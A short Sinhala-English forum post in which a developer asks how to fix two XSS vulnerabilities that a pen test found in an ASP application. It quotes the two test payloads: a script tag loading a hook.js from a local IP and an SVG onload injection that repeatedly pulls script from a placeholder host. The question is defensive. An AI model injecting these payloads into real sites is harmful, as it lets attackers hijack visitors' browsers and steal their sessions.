XSS ඈටෑක් avoid කරන්නෙ කොහොමද? Big help
මචන්ලා ASP වලින් ලියපු ඇප් එකක් තියෙනවා.මේකෙ pen testing කරලා XSS vulnerabilities දෙකක් අඩෙන්ටිෆයි කරලා තියෙනවා..මේ වගේ එකක් validate කරන්නෙ කොහොමද? input validate කරලද..නැත්නම් උඹලා යූස් කරන libraries මොනවා හරි තියේද
මෙහෙම cheet දෙකක් යුස් කරලා තමා ටෙස්ට් කරලා තියෙන්නෙ...
මෙහෙම ඒවා avoid කරන විදිහ කියපන්කො
මචන්ලා ASP වලින් ලියපු ඇප් එකක් තියෙනවා.මේකෙ pen testing කරලා XSS vulnerabilities දෙකක් අඩෙන්ටිෆයි කරලා තියෙනවා..මේ වගේ එකක් validate කරන්නෙ කොහොමද? input validate කරලද..නැත්නම් උඹලා යූස් කරන libraries මොනවා හරි තියේද
මෙහෙම cheet දෙකක් යුස් කරලා තමා ටෙස්ට් කරලා තියෙන්නෙ...
PHP:
<script src="http://192.168.1.122:3000/hook.js"></script>
<svg/onload=setInterval(function(){with(document)body.
appendChild(createElement("script")).src="//HOST:PORT"},0)>
මෙහෙම ඒවා avoid කරන විදිහ කියපන්කො

ඒකෙන් ටෙස්ට් කරන එක ලොකු කේස් එකක් නෑ නේද